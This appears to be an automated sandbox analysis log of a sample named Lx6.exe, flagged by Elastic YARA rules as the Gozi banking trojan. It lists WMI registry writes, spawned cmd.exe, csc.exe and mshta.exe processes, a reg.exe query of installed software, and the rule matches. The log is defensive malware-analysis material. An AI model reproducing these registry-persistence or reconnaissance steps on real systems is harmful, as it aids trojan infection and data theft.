Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00757003	0_2_00757003
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0077115B	0_2_0077115B
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00772AC4	0_2_00772AC4
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00765CFD	0_2_00765CFD
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00767702	0_2_00767702
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075579B	0_2_0075579B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03042AC4	35_2_03042AC4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0304115B	35_2_0304115B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03027003	35_2_03027003
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03037702	35_2_03037702
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302579B	35_2_0302579B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03035CFD	35_2_03035CFD
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E1AE8	41_2_000001CEDB3E1AE8
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4088C8	41_2_000001CEDB4088C8
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E8454	41_2_000001CEDB3E8454
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FBB44	41_2_000001CEDB3FBB44
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB405B10	41_2_000001CEDB405B10
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3EE388	41_2_000001CEDB3EE388
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F8B60	41_2_000001CEDB3F8B60
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40B28C	41_2_000001CEDB40B28C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40321C	41_2_000001CEDB40321C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3EC29C	41_2_000001CEDB3EC29C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FB304	41_2_000001CEDB3FB304
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E92E4	41_2_000001CEDB3E92E4
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB408174	41_2_000001CEDB408174
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB409978	41_2_000001CEDB409978
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FB16C	41_2_000001CEDB3FB16C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F5954	41_2_000001CEDB3F5954
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F0A0C	41_2_000001CEDB3F0A0C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F51D0	41_2_000001CEDB3F51D0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB403878	41_2_000001CEDB403878
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F10BC	41_2_000001CEDB3F10BC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F8890	41_2_000001CEDB3F8890
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FD774	41_2_000001CEDB3FD774
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E4770	41_2_000001CEDB3E4770
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E77AC	41_2_000001CEDB3E77AC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB409000	41_2_000001CEDB409000
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB405FC0	41_2_000001CEDB405FC0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E5FD0	41_2_000001CEDB3E5FD0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F6E4C	41_2_000001CEDB3F6E4C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40AE38	41_2_000001CEDB40AE38
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F1E9C	41_2_000001CEDB3F1E9C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FB6F0	41_2_000001CEDB3FB6F0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FED64	41_2_000001CEDB3FED64
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB403D70	41_2_000001CEDB403D70
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB402578	41_2_000001CEDB402578
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F3DBC	41_2_000001CEDB3F3DBC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E75A4	41_2_000001CEDB3E75A4
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4045BC	41_2_000001CEDB4045BC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F6428	41_2_000001CEDB3F6428
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FE434	41_2_000001CEDB3FE434
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E6458	41_2_000001CEDB3E6458
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3ECC54	41_2_000001CEDB3ECC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB88C8	62_2_0000019933FB88C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F98454	62_2_0000019933F98454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F91AE8	62_2_0000019933F91AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB321C	62_2_0000019933FB321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA0A0C	62_2_0000019933FA0A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA51D0	62_2_0000019933FA51D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB8174	62_2_0000019933FB8174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB9978	62_2_0000019933FB9978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAB16C	62_2_0000019933FAB16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA5954	62_2_0000019933FA5954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA10BC	62_2_0000019933FA10BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA8890	62_2_0000019933FA8890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB3878	62_2_0000019933FB3878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB9000	62_2_0000019933FB9000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F95FD0	62_2_0000019933F95FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB5FC0	62_2_0000019933FB5FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F977AC	62_2_0000019933F977AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAD774	62_2_0000019933FAD774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F94770	62_2_0000019933F94770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAB6F0	62_2_0000019933FAB6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA1E9C	62_2_0000019933FA1E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA6E4C	62_2_0000019933FA6E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FBAE38	62_2_0000019933FBAE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB45BC	62_2_0000019933FB45BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA3DBC	62_2_0000019933FA3DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F975A4	62_2_0000019933F975A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB2578	62_2_0000019933FB2578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB3D70	62_2_0000019933FB3D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAED64	62_2_0000019933FAED64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9CC54	62_2_0000019933F9CC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F96458	62_2_0000019933F96458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAE434	62_2_0000019933FAE434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA6428	62_2_0000019933FA6428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9E388	62_2_0000019933F9E388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA8B60	62_2_0000019933FA8B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FABB44	62_2_0000019933FABB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB5B10	62_2_0000019933FB5B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAB304	62_2_0000019933FAB304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F992E4	62_2_0000019933F992E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9C29C	62_2_0000019933F9C29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FBB28C	62_2_0000019933FBB28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F8454	67_2_000001FA9D6F8454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F1AE8	67_2_000001FA9D6F1AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D719000	67_2_000001FA9D719000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D715FC0	67_2_000001FA9D715FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F5FD0	67_2_000001FA9D6F5FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D708890	67_2_000001FA9D708890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D713878	67_2_000001FA9D713878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70B6F0	67_2_000001FA9D70B6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F77AC	67_2_000001FA9D6F77AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70D774	67_2_000001FA9D70D774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F4770	67_2_000001FA9D6F4770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D71321C	67_2_000001FA9D71321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D700A0C	67_2_000001FA9D700A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7051D0	67_2_000001FA9D7051D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6FC29C	67_2_000001FA9D6FC29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D71B28C	67_2_000001FA9D71B28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7010BC	67_2_000001FA9D7010BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7188C8	67_2_000001FA9D7188C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70B16C	67_2_000001FA9D70B16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D718174	67_2_000001FA9D718174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D719978	67_2_000001FA9D719978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D705954	67_2_000001FA9D705954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70E434	67_2_000001FA9D70E434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D706428	67_2_000001FA9D706428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6FCC54	67_2_000001FA9D6FCC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F6458	67_2_000001FA9D6F6458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D715B10	67_2_000001FA9D715B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70B304	67_2_000001FA9D70B304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F92E4	67_2_000001FA9D6F92E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6FE388	67_2_000001FA9D6FE388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D708B60	67_2_000001FA9D708B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70BB44	67_2_000001FA9D70BB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D71AE38	67_2_000001FA9D71AE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D703DBC	67_2_000001FA9D703DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7145BC	67_2_000001FA9D7145BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D701E9C	67_2_000001FA9D701E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D706E4C	67_2_000001FA9D706E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F75A4	67_2_000001FA9D6F75A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D713D70	67_2_000001FA9D713D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D712578	67_2_000001FA9D712578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70ED64	67_2_000001FA9D70ED64

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0075C875 CreateProcessAsUserA,

0_2_0075C875

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

Source: Lx6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
